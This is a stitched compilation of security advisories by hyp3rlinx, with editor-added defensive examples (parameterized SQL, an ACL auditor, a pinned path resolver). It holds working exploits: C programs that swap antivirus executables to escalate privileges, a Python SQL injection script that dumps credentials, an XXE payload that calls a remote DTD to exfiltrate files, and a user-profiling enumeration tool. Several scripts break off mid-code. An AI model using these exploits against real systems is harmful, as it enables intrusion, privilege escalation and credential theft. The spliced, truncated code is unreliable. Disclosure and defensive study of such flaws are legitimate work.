The Excel query-from-file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as Html page" functionality upon receiving errors importing a specially crafted XML file. This can result in potential remote data exfiltration; user interaction is required to exploit this vulnerability.

Tested successfully on Windows 10, .NET framework version v4.0.30319.

C:\>dir /b %windir%\Microsoft.NET\Framework\v*
v4.0.30319

[Exploit/POC]
Create a new ".xlsx" file, then go to the Data tab and choose 'New Query/From File/From XML'.

1) You will get an error like:
   "Error: Unable to connect. We encountered an error while trying to connect."
   The user will then get an option to 'Edit' where they can import the file as an HTML file.
   Result: local data can be exfiltrated to a remote server.

2) Excel will then give you the option to 'Edit' and import as 'Html Page' from the drop-down menu in Excel. If the user chooses to import as HTML, the XXE attack will succeed, e.g.:

127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON= EGA80WOA.FO /1.1" 200 -

Malicious XML file to load as New Data Query "test.xml"

http://127.0.0.1:8000/payload.dtd'> %dtd;]> &send;

[Network Access]
Local

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: May 10, 2019
MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release. Engineering Team may or may not fix in a future version of the release."
November 30, 2019 : Public Disclosure
[FD] Max Secure Anti Virus Plus - 19.0.4.020 / CVE-2019-19382 Insecure Permissions
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec

[Vendor]
www.maxpcsecure.com

[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020
File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe

[Vulnerability Type]
Insecure Permissions

[CVE Reference]
CVE-2019-19382

[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory. Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation.

C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F

[Affected Component]
Permissions on installation directory

[Exploit/POC]

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"

/* Max Secure Anti Virus Plus PoC By hyp3rlinx */

BOOL PWNED=FALSE;

BOOL FileExists(LPCTSTR szPath){
    DWORD dwAttrib = GetFileAttributes(szPath);
    return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

void main(void){
    if(!FileExists(DISABLED_TARGET)){
        CopyFile(TARGET, TMP, FALSE);
        Sleep(1000);
        CopyFile(TMP, DISABLED_TARGET, FALSE);
        printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
        Sleep(1000);
        printf("[+] Disabled MaxSDUI.exe ...\n");
        Sleep(300);
    }else{
        PWNED=TRUE;
    }
    if(!PWNED){
        char fname[MAX_PATH];
        char newLoc[]=TARGET;
        DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
        if (size){
            printf("[+] Copying exploit to vuln dir...\n");
            Sleep(1000);
            CopyFile(fname, TARGET, FALSE);
            printf("[+] Replaced legit Max Secure EXE...\n");
            Sleep(2000);
            printf("[+] Done!\n");
            MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
            Sleep(1000);
            exit(0);
        }
    }else{
        if(FileExists(TMP)){
            remove(TMP);
        }
        printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
        printf("[+] hyp3rlinx\n");
        system("pause");
    }
}

[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure
[FD] NAPC Xinet Elegant 6 Asset Library Web Interface v6.1.655 / Pre-Auth SQL Injection 0Day
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.napc.com

[Product]
Xinet Elegant 6 Asset Library Web Interface v6.1.655

Web based interface for the Xinet asset management solution.

[Vulnerability Type]
Pre-Auth SQL Injection

[CVE Reference]
CVE-2019-19245

[Security Issue]
NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows Pre-Authentication Error based SQL Injection via the /elegant6/login LoginForm[username] field when double quotes are used. The vulnerable version seems to be old, but it may still be possible to find it deployed, as I have.

Vulnerable Parameter: LoginForm[username] (POST method)

[Exploit/POC]

import requests,time,re,sys,argparse

#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#==
#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS: LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[username]=SQL&yt0
#SQL INJECTION VULN PARAM --> LoginForm[username]
#

IP=""
PORT="80"
URL=""
NUM_INJECTS=20
k=1
j=0
TABLES=False
CREDS=False
SHOW_SQL_ERROR=False

def vuln_ver_chk():
    global IP, PORT
    TARGET = "http://"+IP+":"+PORT+"/elegant6/login"
    response = requests.get(TARGET)
    if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content):
        print "[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655."
        return True
    print "[!] Version not vulnerable :("
    return False

def sql_inject_request(SQL):
    global IP, PORT
    URL = "http://"+IP+":"+PORT+"/elegant6/login"
    tmp=""
    headers = {'User-Agent': 'Mozilla/5.0'}
    payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
    session = requests.Session()
    res = session.post(URL,headers=headers,data=payload)
    idx = res.content.find('CDbCommand')   # Start of SQL Injection Error in response
    idx2 = res.content.find('key 1')       # End of SQL Injection Error in response
    return res.content[idx : idx2+3]

#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
    global k,j
    while j < NUM_INJECTS:
        j+=1
        if k !=1:
            k+=1
        return str(j)+','+str(k)

def tidy_up(results):
    global CREDS
    idx = results.find("'")
    if idx != -1:
        idx2 = results.rfind("'")
        if not CREDS:
            return results[idx + 1: idx2 -2]
        else:
            return results[idx + 2: idx2]

def breach(i):
    global k,j,NUM_INJECTS,SHOW_SQL_ERROR
    result=""
    #Dump Usernames & Passwords
    if CREDS:
        if i % 2 == 0:
            target='username'
        else:
            target='password'
        SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))'
             'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -')
        if not SHOW_SQL_ERROR:
            result = tidy_up(sql_inject_request(SQL))
        else:
            result = sql_inject_request(SQL)+"\n"
        print "[+] Dumping "+target+": "+result
    #Dump Tables
    if TABLES:
        while j < NUM_INJECTS:
            nums = inc()
            SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
                 'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')
            if not SHOW_SQL_ERROR:
                result = tidy_up(sql_inject_request(SQL))
            else:
                result = sql_inject_request(SQL) + "\n"
            print "[+] Dumping Table... " +result
            time.sleep(0.3)

def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--ip_address", help=".")
    parser.add_argument("-p", "--port", help="Port, Default is 80")
    parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
    parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
    parser.add_argument("-m", "--max_injects", nargs="?", const="1"
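The advisory's exploit works because the login form's username is spliced into SQL text and the resulting database error (the CDbCommand message the script searches for) is echoed to the client. The added example below is mine, not the advisory's or NAPC's code: it puts the vulnerable pattern beside the parameterized form on an in-memory SQLite table with constructed rows, and shows that only the concatenating version turns a stray quote into a database error. SQLite delimits strings with single quotes where the advisory's MySQL target accepts double quotes, so the probe value uses a single quote.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the application's user table (constructed test rows)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO user (username, password) VALUES (?, ?)",
                    [("alice", "hash-placeholder-1"), ("bob", "hash-placeholder-2")])
    return con


def lookup_vulnerable(con, username):
    """The defect class from the advisory: the login name is spliced into the SQL text,
    so a quote character in it changes the statement."""
    sql = "SELECT id, username FROM user WHERE username = '%s'" % username
    return con.execute(sql).fetchone()


def lookup_safe(con, username):
    """Bound parameter: the value is never parsed as SQL, whatever it contains."""
    return con.execute("SELECT id, username FROM user WHERE username = ?",
                       (username,)).fetchone()


def probe(fn, con, username):
    """Run a lookup and report ('row', row) or ('error', message). A database error
    surfacing for a quote-bearing username is exactly the signal error-based injection
    needs, and the one an application log or WAF rule should alert on."""
    try:
        return ("row", fn(con, username))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for name in ("alice", "alice'"):
        print("vulnerable:", probe(lookup_vulnerable, db, name))
        print("safe:      ", probe(lookup_safe, db, name))
```

The safe variant returns no row for the malformed name and raises nothing, so there is no error text to leak database structure through; on the application side, the matching detection is any SQL exception reaching the HTTP response for the login endpoint.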
[FD] ScanGuard Antivirus (latest version) / Insecure Permissions
[+] Cred

its: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec

[Vendor]
https://www.scanguard.com

[Product]
ScanGuard Antivirus
ScanGuard_Setup.exe
Hash: 1a63c67a249da0c2e9abd09d35c3c65d

Complete Antivirus & Security Software

[Vulnerability Type]
Insecure Permissions

[CVE Reference]
CVE-2019-18895

[Affected Product Code Base]
ScanGuard Antivirus - latest

[Affected Component]
Permissions on installation directory

[Attack Type]
Local

[Impact Code execution]
true

[Impact Escalation of Privileges]
true

[Impact Information Disclosure]
true

[Attack Vectors]
Low integrity malware or a non-privileged user replaces an executable to gain Admin privileges.

[Reference]
https://support.scanguard.com/en/kb/22/upgrades-available

[Security Issue]
Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to privilege escalation via a Trojan horse executable file. The product sets weak access control restrictions, as permissions are set to Full Control for the Everyone group. This can allow low integrity malware the ability to replace ScanGuard executables.
C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F
                                      Everyone:(OI)(CI)(ID)F
                                      NT SERVICE\TrustedInstaller:(ID)F
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                      NT AUTHORITY\SYSTEM:(ID)F

[Exploit/POC]

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe"
#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf"

/* ScanGuard EoP PoC By hyp3rlinx */

BOOL PWNED=FALSE;

BOOL FileExists(LPCTSTR szPath){
    DWORD dwAttrib = GetFileAttributes(szPath);
    return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

void main(void){
    if(!FileExists(DISABLED_TARGET)){
        rename(TARGET, DISABLED_TARGET);
        printf("[+] ScanGuard Antivirus EoP PoC\n");
        Sleep(300);
        printf("[+] Disabled ScanGuard.exe ...\n");
        Sleep(300);
    }else{
        PWNED=TRUE;
    }
    char fname[MAX_PATH];
    char newLoc[]=TARGET;
    DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
    if (size){
        if(!PWNED){
            printf("[+] Copying exploit to vuln dir...\n");
            Sleep(300);
            CopyFile(fname, newLoc, FALSE);
            printf("[+] Replaced legit ScanGuard...\n");
            Sleep(300);
            printf("[+] Done!\n");
            Sleep(300);
            MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk");
            Sleep(2000);
            exit(0);
        }else{
            if(FileExists("ScamGuard.lnk")){
                system("DEL /f ScamGuard.lnk");
            }
            printf("[+] ScamGuard PWNED!!!\n");
            printf("[+] By hyp3rlinx\n");
            system("pause");
        }
    }
}

[Disclosure Timeline]
Vendor Notification: September 16, 2019
Received vendor acknowledgement: September 16, 2019
Second contact follow up: September 29, 2019
No more vendor replies.
November 12, 2019 : Public Disclosure
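The Max Secure and ScanGuard advisories show the same defect from the defender's side: cacls/icacls listings where Everyone, BUILTIN\Users or Authenticated Users hold Full control over files under Program Files, which is all a low-privilege process needs to swap a binary that a privileged service will later run. The added example below is mine, not code from either advisory; it parses icacls-style output (a constructed sample modelled on the two listings, plus one correctly locked-down file) and reports every ACE that lets a standard-user principal modify or replace an object. It is the check to run over a product's install directory after setup, or to wire into a build's post-install test.

```python
import re

# Constructed sample in the shape of icacls/cacls output, modelled on the ACLs quoted in
# the ScanGuard and Max Secure advisories above, plus one file with sane permissions.
SAMPLE_ICACLS = r"""
C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F
                                      Everyone:(OI)(CI)(ID)F
                                      NT SERVICE\TrustedInstaller:(ID)F
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                      NT AUTHORITY\SYSTEM:(ID)F
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F
C:\Program Files\Hardened Product\svc.exe NT AUTHORITY\SYSTEM:(I)F
                                          BUILTIN\Administrators:(I)F
                                          BUILTIN\Users:(I)(RX)
"""

# Principals any standard user (or malware running as one) can act as.
LOW_PRIV = {"everyone", "builtin\\users", "users", "nt authority\\authenticated users",
            "authenticated users", "nt authority\\interactive", "interactive"}

# Inheritance flags (icacls prints (I), cacls prints (ID)); they carry no rights.
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I", "ID"}

# Rights that let the holder change, delete or replace the object (simple and specific forms).
WRITE_TOKENS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DE", "DC", "WDAC", "WO", "GA", "GW"}

# ACE at the end of a path line: DOMAIN\name (spaces allowed in the name part) + rights.
ACE_RX = re.compile(
    r"(?P<principal>(?:(?:NT AUTHORITY|NT SERVICE|BUILTIN|[^\s:\\]+)\\[^:\\]+?|[^\s:\\]+))"
    r":(?P<rest>\S+)$")


def parse_rights(rest):
    """'(OI)(CI)(ID)F' -> {'F'}; '(I)(RX,W)' -> {'RX', 'W'}; inheritance flags are dropped."""
    groups = re.findall(r"\(([^)]*)\)", rest)
    tail = re.sub(r"\([^)]*\)", "", rest)
    tokens = set()
    if tail:
        tokens.add(tail)
    for g in groups:
        if g not in INHERIT_FLAGS:
            tokens.update(t.strip() for t in g.split(","))
    return tokens


def parse_icacls(output):
    """Yield (path, principal, rights_set) for every ACE in icacls-style output."""
    path = None
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        if raw[:1] != " ":                       # path line: path followed by its first ACE
            m = ACE_RX.search(line)
            if not m:
                continue
            path = line[:m.start()].rstrip()
            principal, rest = m.group("principal"), m.group("rest")
        else:                                    # continuation line: ACE only
            principal, _, rest = line.rpartition(":")
        yield path, principal, parse_rights(rest)


def audit_icacls(output):
    """(path, principal, rights) triples where a low-privilege principal can modify the object."""
    findings = []
    for path, principal, rights in parse_icacls(output):
        hit = rights & WRITE_TOKENS
        if principal.lower() in LOW_PRIV and hit:
            findings.append((path, principal, ",".join(sorted(hit))))
    return findings


if __name__ == "__main__":
    for path, who, rights in audit_icacls(SAMPLE_ICACLS):
        print("[!] %s: %s has %s" % (path, who, rights))
```

Feed it `icacls "C:\Program Files\<product>" /t` output on a live host; an empty result for the Users, Everyone and Authenticated Users principals is the expected state for anything a SYSTEM service will load.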
[FD] Trend Micro Anti-Threat Toolkit (ATTK) <= v1.62.0.1218 Remote Code Execution 0day CVE-2019-9491
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
[+] ISR: Apparition Security

[Vendor]
www.trendmicro.com

[Product]
Trend Micro Anti-Threat Toolkit (ATTK) 1.62.0.1218 and below

Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean infections. It can be used to perform system forensic scans and clean the following infection types:
General malware infection
Master boot record infection
CIDOX/RODNIX infection
Rootkit infection
Zbot infection
Cryptolocker infection
etc..

[Vulnerability Type]
Remote Code Execution

[CVE Reference]
CVE-2019-9491

[Security Issue]
Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if a malware author happens to use the vulnerable naming convention of "cmd.exe" or "regedit.exe" and the malware can be placed in the vicinity of the ATTK when a scan is launched by the end user.

Since the ATTK is signed by a verified publisher and therefore assumed trusted, any MotW security warnings are bypassed if the malware was internet downloaded; it can also become a persistence mechanism, as each time the Anti-Threat Toolkit is run, so is the attacker's malware.

Standalone affected components of ATTK and other integrations (e.g. WCRY Patch Tool, OfficeScan Toolbox, etc.):

attk_collector_cli_x64.exe
Hash: e8503e9897fd56eac0ce3c3f6db24fb1

TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f

attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed

[References]
https://success.trendmicro.com/solution/000149878

*All versions of the ATTK have been updated with the newer version.
Anti-Threat Toolkit (ATTK) 1.62.0.1223

[Exploit/POC]
Compile an .EXE using the "C" code below and use the naming convention of "cmd.exe" or "regedit.exe". Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed.

#include <stdio.h>
#include <windows.h>

void main(void){
    puts("Trend Micro Anti-Threat Toolkit PWNED!");
    puts("Discovery: hyp3rlinx");
    puts("CVE-2019-9491\n");
    WinExec("powershell", 0);
}

[POC Video URL]
https://www.youtube.com/watch?v=HBrRVe8WCHs

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: September 9, 2019
Vendor confirms vulnerability: September 25, 2019
Vendor requests to coordinate advisory: September 25, 2019
October 19, 2019 : Public Disclosure
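The ATTK bug above is a search-order problem: the toolkit ran whatever file named cmd.exe or regedit.exe it found near its working directory instead of the system copy, and its own publisher signature then lent that file trust. The added example below is mine, not Trend Micro's code or the advisory's PoC; it contrasts a by-name lookup with one pinned to the system directory and an allow-list of names, using a throwaway directory layout with placeholder files so it runs anywhere. A production resolver would additionally verify the Authenticode signature of the resolved file, which this offline example does not show.

```python
import os
import shutil
import tempfile

# Names the advisory says the toolkit resolved by bare name.
SYSTEM_TOOLS = {"cmd.exe", "regedit.exe"}


def resolve_by_name(name, search_dirs):
    """What a tool that hands a bare name to the loader effectively does: the first
    directory in the search order that contains the name wins, and the working
    directory is searched early, so a planted copy shadows the real one."""
    for d in search_dirs:
        cand = os.path.join(d, name)
        if os.path.isfile(cand):
            return cand
    return None


def resolve_pinned(name, system_dir):
    """Hardened form: only an allow-listed name, only from the system directory,
    and the canonical path of the result must still lie inside that directory
    (a junction or symlink pointing elsewhere is rejected)."""
    if name.lower() not in SYSTEM_TOOLS:
        raise ValueError("not an allow-listed system tool: %r" % name)
    sys_real = os.path.realpath(system_dir)
    real = os.path.realpath(os.path.join(sys_real, name))
    if not real.lower().startswith(sys_real.lower() + os.sep):
        raise ValueError("resolved outside the system directory: %r" % real)
    if not os.path.isfile(real):
        raise FileNotFoundError(real)
    return real


def demo():
    """Build a constructed layout: a decoy cmd.exe in the scan folder and a placeholder
    'real' one in a stand-in System32. Returns (decoy_won_by_name, pinned_hit_system)."""
    root = tempfile.mkdtemp()
    try:
        workdir = os.path.join(root, "scan-folder")
        sysdir = os.path.join(root, "System32")
        os.makedirs(workdir)
        os.makedirs(sysdir)
        for d in (workdir, sysdir):
            with open(os.path.join(d, "cmd.exe"), "wb") as fh:
                fh.write(b"constructed placeholder, not a real binary")
        by_name = resolve_by_name("cmd.exe", [workdir, sysdir])
        pinned = resolve_pinned("cmd.exe", sysdir)
        return (os.path.dirname(by_name) == workdir,
                os.path.dirname(pinned) == os.path.realpath(sysdir))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The same allow-list-plus-pinned-directory rule is the detection heuristic in reverse: a file named cmd.exe or regedit.exe anywhere outside %SystemRoot% is worth an alert on a host where a scanning tool is about to run.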
[FD] NtFileSins v2.1 / Windows NTFS Privileged File Access Enumeration Tool
Fixed a bug in the save report logic.

from subprocess import Popen, PIPE
import sys,argparse,re

# NtFileSins v2.1
# Fixed: save() logic to log the report in case no Zone.Identifiers are found.
# Added: Check for Zone.Identifier:$DATA to see if any identified files were downloaded from the internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# whether a file exists or not, when restricted access is attempted by another user.
#
# However, by accessing files directly, i.e. attempting to "open" them from the cmd.exe shell,
# we can determine existence by comparing the inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
#               2) artifacts must contain a dot "." or the check returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin, so this script is not required.
#
# Profile other users by comparing NTFS error messages to potentially learn their activities or the machine's purpose.
# For evil, or maybe to check for basic malware IOC existence on disk with user-only rights.
#
#==#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1
#
# By John Page (aka hyp3rlinx)
#
# Apparition Security
#
#==#

BANNER='''
 _ ___ ___ _ / | / /_ __/ (_) /__ / ___/(_)___ _ / |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/ / /| / / / / __/ / / / __/__/ / / / / (__ ) /_/ |_/ /_/ /_/ /_/_/\___//_/_/ /_//
 v2.1 By hyp3rlinx ApparitionSec
'''

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"
USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
           "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]
APPDATA_DIR=["AppData/Local/Temp"]
EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3",
            ".bat",".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])
REPORT="NtFileSins_Log.txt"

def usage():
    print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
    print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
    print '-u victim -a ""'
    print "-u victim -d Downloads -a -s"
    print '-u victim -d Contacts -a "Mike N.contact"'
    print "-u victim -a APT.txt -b -n"
    print "-u victim -d -z Desktop/MyFiles -a <.name>"
    print "-u victim -d Searches -a .search-ms"
    print "-u victim -d . -a "
    print "-u victim -d desktop -a inverted-crosses.mp3 -b"
    print "-u victim -d Downloads -a APT.exe -b"
    print "-u victim -f list_of_files.txt"
    print "-u victim -f list_of_files.txt -b -s"
    print "-u victim -f list_of_files.txt -x .txt"
    print "-u victim -d desktop -f list_of_files.txt -b"
    print "-u victim -d desktop -f list_of_files.txt -x .rar"
    print "-u victim -z -s -f list_of_files.txt"

def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--user", help="Privileged user target")
    parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .")
    parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
    parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/
[FD] NtFileSins v2 / Windows NTFS Privileged File Access Enumeration Tool
NtFileSins v2 exploits the Windows privileged file access enumeration vulnerability to gather intelligence on privileged users. This version adds Zone.Identifier checks to see whether any discovered files were downloaded from the internet.

from subprocess import Popen, PIPE
import sys,argparse,re

# NtFileSins v2
# Added: Check for Zone.Identifier:$DATA to see if any identified files were downloaded from the internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# whether a file exists or not, when restricted access is attempted by another user.
#
# However, by accessing files directly, i.e. attempting to "open" them from the cmd.exe shell,
# we can determine existence by comparing the inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges.
#               2) artifacts must contain a dot "." or the check returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin, so this script is not required.
#
# Profile other users by comparing NTFS error messages to potentially learn their activities or the machine's purpose.
# For evil, or maybe to check for basic malware IOC existence on disk with user-only rights.
#
#=#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.
#
# By John Page (aka hyp3rlinx)
#
# Apparition Security
#
#=#

BANNER='''
 _ ___ ___ _ / | / /_ __/ (_) /__ / ___/(_)___ _ / |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/ / /| / / / / __/ / / / __/__/ / / / / (__ ) /_/ |_/ /_/ /_/ /_/_/\___//_/_/ /_//
 v2 By hyp3rlinx ApparitionSec
'''

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"
USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
           "Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]
APPDATA_DIR=["AppData/Local/Temp"]
EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3",
            ".bat",".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])
REPORT="NtFileSins_Log.txt"

def usage():
    print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
    print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
    print '-u victim -a ""'
    print "-u victim -d Downloads -a -s"
    print '-u victim -d Contacts -a "Mike N.contact"'
    print "-u victim -a APT.txt -b -n"
    print "-u victim -d -z Desktop/MyFiles -a <.name>"
    print "-u victim -d Searches -a .search-ms"
    print "-u victim -d . -a "
    print "-u victim -d desktop -a inverted-crosses.mp3 -b"
    print "-u victim -d Downloads -a APT.exe -b"
    print "-u victim -f list_of_files.txt"
    print "-u victim -f list_of_files.txt -b -s"
    print "-u victim -f list_of_files.txt -x .txt"
    print "-u victim -d desktop -f list_of_files.txt -b"
    print "-u victim -d desktop -f list_of_files.txt -x .rar"
    print "-u victim -z -s -f list_of_files.txt"

def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--user", help="Privileged user target")
    parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .")
    parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
    parser.add_argument("-t", "--appdata"
[FD] Windows NTFS / Privileged File Access Enumeration
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows NTFS

NTFS is a proprietary journaling file system developed by Microsoft. Starting with Windows NT 3.1, it is the default file system of the Windows NT family.

[Vulnerability Type]
Privileged File Access Enumeration

[CVE Reference]
N/A

[Security Issue]
Attackers possessing user-only rights can gather intelligence on, or profile the activities of, other user accounts by brute forcing a correct file name. This is possible because Windows returns inconsistent error messages when an unauthorized file is accessed, depending on whether the file name contains a valid extension or a "." (dot) as part of the file or folder name.

Typically, you see enumeration in web-application attacks that target account usernames. In this case we are targeting the file names of other users: maybe we need to locate files up front that we wish to steal, possibly prior to launching, say, an XXE exploit to steal them, or maybe we just passively sniff the account's directories to profile the mark and learn their daily activities.

Standard users attempting to open another user's files or folders that do not contain a valid extension or a dot "." in the name are always issued the expected "Access is denied" system error message. However, for files that contain a dot in the name and that also do not exist, the system echoes the attacker-friendly warning "The system cannot find the file". This inconsistency allows attackers to infer that a file EXISTS, because otherwise we would get "The system cannot find the file".

